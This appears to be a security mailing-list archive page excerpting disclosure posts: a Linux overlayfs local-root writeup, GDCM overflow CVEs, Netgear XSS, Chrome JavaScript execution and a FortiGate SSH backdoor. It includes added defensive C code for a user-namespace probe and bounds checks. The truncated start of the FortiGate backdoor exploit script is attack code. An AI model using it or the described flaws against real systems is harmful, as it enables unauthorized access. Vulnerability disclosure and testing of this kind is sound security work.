Linux user namespaces overlayfs local root

Posted by halfdog on Jan 11

Hello List,

Preamble:

As the issue described herein was fixed 20161206 in Linux Kernel
already and publicly disclosed as security vulnerability 20151224,
here is a short writeup and POC exploit to understand the issue and
perform testing.

Description:

Linux user namespaces allow mounting file systems as a normal user,
including overlayfs. As many of those features were not designed
with namespaces in mind, this increases the attack surface…
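As an added check, not halfdog's PoC and not code from the post: the precondition the post relies on is that an unprivileged user can create a user plus mount namespace and mount overlayfs inside it. The probe below forks a child, unshares CLONE_NEWUSER|CLONE_NEWNS, maps the caller's uid/gid to 0 inside the namespace, and attempts an overlay mount in a scratch directory under /tmp, then reports which step was refused. The scratch paths and the probe_ names are assumptions for illustration; it is Linux-only and the mount, if it succeeds, exists only in the child's mount namespace.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Outcome of the probe; the value doubles as the child's exit status. */
enum probe_result {
    PROBE_OVERLAY_MOUNTED = 0, /* unprivileged userns and overlay mount both allowed */
    PROBE_NO_USERNS = 1,       /* unshare(CLONE_NEWUSER|CLONE_NEWNS) refused */
    PROBE_NO_OVERLAY = 2,      /* namespace created, overlay mount refused inside it */
    PROBE_ERROR = 3            /* setup failure unrelated to the question */
};

const char *probe_result_name(int r)
{
    static const char *names[] = {
        "overlayfs mountable in an unprivileged user namespace",
        "unprivileged user namespaces not available",
        "user namespace created, overlayfs mount refused",
        "probe error"
    };
    return (r >= 0 && r <= PROBE_ERROR) ? names[r] : "unknown";
}

/* Write one string to a file; used for /proc/self/{uid_map,gid_map,setgroups}. */
static int write_file(const char *path, const char *text)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, text, strlen(text));
    close(fd);
    return n == (ssize_t)strlen(text) ? 0 : -1;
}

/* Runs in the forked child: enter a new user+mount namespace, become uid 0
 * inside it, then try an overlay mount on constructed lower/upper/work dirs. */
static int child_probe(void)
{
    char map[64], tmpl[] = "/tmp/ovlprobe.XXXXXX";
    char lower[96], upper[96], work[96], inner[112], merged[96], opts[320];
    int result;

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)
        return PROBE_NO_USERNS;
    snprintf(map, sizeof map, "0 %u 1", (unsigned)getuid());
    if (write_file("/proc/self/uid_map", map) != 0)
        return PROBE_ERROR;
    /* Since 3.19 setgroups must be "deny" before an unprivileged gid_map write. */
    write_file("/proc/self/setgroups", "deny");
    snprintf(map, sizeof map, "0 %u 1", (unsigned)getgid());
    if (write_file("/proc/self/gid_map", map) != 0)
        return PROBE_ERROR;

    if (mkdtemp(tmpl) == NULL)
        return PROBE_ERROR;
    snprintf(lower, sizeof lower, "%s/lower", tmpl);
    snprintf(upper, sizeof upper, "%s/upper", tmpl);
    snprintf(work, sizeof work, "%s/work", tmpl);
    snprintf(inner, sizeof inner, "%s/work", work); /* overlayfs creates work/work */
    snprintf(merged, sizeof merged, "%s/merged", tmpl);
    if (mkdir(lower, 0700) || mkdir(upper, 0700) || mkdir(work, 0700) || mkdir(merged, 0700))
        return PROBE_ERROR;
    snprintf(opts, sizeof opts, "lowerdir=%s,upperdir=%s,workdir=%s", lower, upper, work);

    result = mount("overlay", merged, "overlay", 0, opts) == 0 ? PROBE_OVERLAY_MOUNTED
                                                                : PROBE_NO_OVERLAY;
    if (result == PROBE_OVERLAY_MOUNTED)
        umount(merged);
    /* best-effort cleanup of the scratch tree */
    rmdir(inner); rmdir(work); rmdir(lower); rmdir(upper); rmdir(merged); rmdir(tmpl);
    return result;
}

/* Parent side: isolate the namespace changes in a child and return its verdict. */
int probe_userns_overlayfs(void)
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return PROBE_ERROR;
    if (pid == 0)
        _exit(child_probe());
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return PROBE_ERROR;
    return WEXITSTATUS(status);
}

int main(void)
{
    int r = probe_userns_overlayfs();
    printf("%d: %s\n", r, probe_result_name(r));
    return 0;
}
```

Run it as an ordinary user on the host you are assessing; a result of 0 means the mount step the post builds on is reachable without privileges, 1 means unprivileged user namespaces are disabled (for example by the distribution's sysctl), and 2 means the kernel refuses overlayfs inside an unprivileged namespace.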

CVE-2015-8396: GDCM buffer overflow in ImageRegionReader::ReadIntoBuffer

Posted by Stelios Tsampas on Jan 11

Grassroots DICOM (GDCM) is a C++ library for processing DICOM medical
images.
It provides routines to view and manipulate a wide range of image formats
and can be accessed through many popular programming languages like Python,
C#, Java and PHP.

GDCM versions 2.6.0 and 2.6.1 (and possibly previous versions) are prone
to an
integer overflow vulnerability which leads to a buffer overflow and
potentially to remote code execution. The vulnerability…

CVE-2015-8397: GDCM out-of-bounds read in JPEGLSCodec::DecodeExtent

Posted by Stelios Tsampas on Jan 11

Grassroots DICOM (GDCM) is a C++ library for processing DICOM medical
images.
It provides routines to view and manipulate a wide range of image formats
and can be accessed through many popular programming languages like Python,
C#, Java and PHP.

GDCM versions 2.6.0 and 2.6.1 (and possibly previous versions) are prone to
an out-of-bounds read vulnerability due to missing checks. The vulnerability
occurs during the decoding of JPEG-LS images when…
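The two GDCM advisories above describe the same two decoder mistakes: a region size multiplied together in 32 bits that wraps and under-sizes a buffer (CVE-2015-8396), and a requested extent that is never checked against the image dimensions before it is read (CVE-2015-8397). The following added example is not GDCM code; the image and extent structs, function names and the 4x4 sample image are assumptions constructed for illustration. It puts the wrapping computation beside the checked one and shows an extent read that validates every index before the copy.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed minimal descriptors, not GDCM's types. */
struct image {
    uint32_t width, height, bytes_per_pixel;
    const uint8_t *pixels;   /* row-major, width*height*bytes_per_pixel bytes */
    size_t pixels_len;
};
struct extent { uint32_t x, y, w, h; };

/* Unchecked form: the product is formed in 32 bits and silently wraps, so a
 * crafted header can make a huge region look tiny and the later copy run past
 * the buffer allocated from this value. */
uint32_t unchecked_region_bytes(uint32_t w, uint32_t h, uint32_t bpp)
{
    return w * h * bpp;
}

/* Checked form: every multiplication is tested; returns 0 and the size on
 * success, -1 if the region does not fit in size_t. */
int checked_region_bytes(uint32_t w, uint32_t h, uint32_t bpp, size_t *out)
{
    size_t n;
    if (__builtin_mul_overflow((size_t)w, (size_t)h, &n) ||
        __builtin_mul_overflow(n, (size_t)bpp, &n))
        return -1;
    *out = n;
    return 0;
}

int region_bytes_overflow(uint32_t w, uint32_t h, uint32_t bpp)
{
    size_t n;
    return checked_region_bytes(w, h, bpp, &n) != 0;
}

/* An extent is usable only if it is non-empty and x+w, y+h (computed in 64
 * bits so they cannot wrap) stay inside the image. */
int extent_in_bounds(const struct image *img, const struct extent *e)
{
    if (e->w == 0 || e->h == 0)
        return 0;
    if ((uint64_t)e->x + e->w > img->width || (uint64_t)e->y + e->h > img->height)
        return 0;
    return 1;
}

/* Copy the extent into dst. The source length, the destination length and the
 * extent are all validated before the first memcpy. Returns bytes written or -1. */
long read_extent_into_buffer(const struct image *img, const struct extent *e,
                             uint8_t *dst, size_t dst_len)
{
    size_t full, need, stride, row;
    if (!extent_in_bounds(img, e))
        return -1;
    if (checked_region_bytes(img->width, img->height, img->bytes_per_pixel, &full) != 0 ||
        full > img->pixels_len)
        return -1;
    if (checked_region_bytes(e->w, e->h, img->bytes_per_pixel, &need) != 0 || need > dst_len)
        return -1;
    stride = (size_t)img->width * img->bytes_per_pixel; /* cannot overflow: full did not */
    row = (size_t)e->w * img->bytes_per_pixel;
    for (uint32_t r = 0; r < e->h; r++) {
        const uint8_t *src = img->pixels + ((size_t)e->y + r) * stride
                             + (size_t)e->x * img->bytes_per_pixel;
        memcpy(dst + (size_t)r * row, src, row);
    }
    return (long)need;
}

/* Constructed sample: a 4x4, 1 byte-per-pixel image whose pixel value equals
 * its index. Reads the given extent into a buffer of dst_len bytes (capped at
 * 16) and returns the sum of the bytes read, or -1 if a check rejected it. */
long demo_extent_sum(uint32_t x, uint32_t y, uint32_t w, uint32_t h, size_t dst_len)
{
    static const uint8_t px[16] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 };
    uint8_t dst[16];
    struct image img = { 4, 4, 1, px, sizeof px };
    struct extent e = { x, y, w, h };
    long n = read_extent_into_buffer(&img, &e, dst, dst_len < sizeof dst ? dst_len : sizeof dst);
    long sum = 0;
    if (n < 0)
        return -1;
    for (long i = 0; i < n; i++)
        sum += dst[i];
    return sum;
}
```

The extent (1,1,2,2) on the sample reads pixels 5, 6, 9 and 10; an extent placed at x = 0xFFFFFFFF is rejected because the 64-bit sum does not wrap back into range, and a 0x10000 by 0x10000 region is reported as 0 bytes by the unchecked form while the checked form of a 0xFFFFFFFF cubed region is refused outright.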

New BlackArch Linux ISOs (2016.01.10) released

Posted by Black Arch on Jan 11

Dear list,

Today, we released new BlackArch Linux ISOs which include more than
1337 tools and come with lots of improvements. The armv6h and armv7h
repositories are filled with about 1200 tools.

A short ChangeLog of the Live-ISOs:

– added more than 30 new tools

– updated system packages and userland files (etc/)

– included linux kernel 4.3.3

– added bluetooth packages: bluez, bluez-firmware, bluez-hid2hci,…

Re: Combining DLL hijacking with USB keyboard emulation

Posted by gremlin on Jan 11

> Many of us have now been long aware of the possibility of
> programming a USB device to emulate a keyboard and automatically
> send keystrokes in order to perform malicious actions on a
> computer. Some of the most interesting payloads that can be used
> with this technique are based around downloading or creating an
> executable file and then running it.
> I’d like to bring to light that this attack could be…

Multiple Cross Site Scripting in Netgear Router Version 1.0.0.24

Posted by CSW Research Lab on Jan 11

Hi,

Can you assign a CVE ID to this flaw?

Details
================

#Product Vendor: Netgear
#Bug Name: Cross Site Scripting in Netgear Router Version 1.0.0.24
#Software: Netgear Router Firmware
#Version: 1.0.0.24
#Last Updated: 10-06-2015
<http://kb.netgear.com/app/answers/detail/a_id/29270/~/jnr1010-firmware-version-1.0.0.24>
#Homepage: http://netgear.com/
#Severity: High
#Vulnerable URL:…

SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7

Posted by operator8203 on Jan 11

#!/usr/bin/env python

# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
# Usage: ./fgt_ssh_backdoor.py <target-ip>

import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty

# keyboard-interactive handler: derives the response from the server's prompt
def custom_handler(title, instructions, prompt_list):
    n = prompt_list[0][0]
    m = hashlib.sha1()
    m.update('\x00' * 12)
    m.update(n +…

Google Chrome – JavaScript Execution Via Default Search Engines

Posted by metalkey net on Jan 11

Google Chrome allows execution of JavaScript via the Default Search Engines
feature.
An exploit can be created to take advantage of this issue by manipulating
the master_preferences file on a victim’s machine.

Video Example:
https://www.youtube.com/watch?v=WoF-LkA6fMk

Walkthrough:
https://m3t4lk3y.wordpress.com/category/google-chrome-search-poison/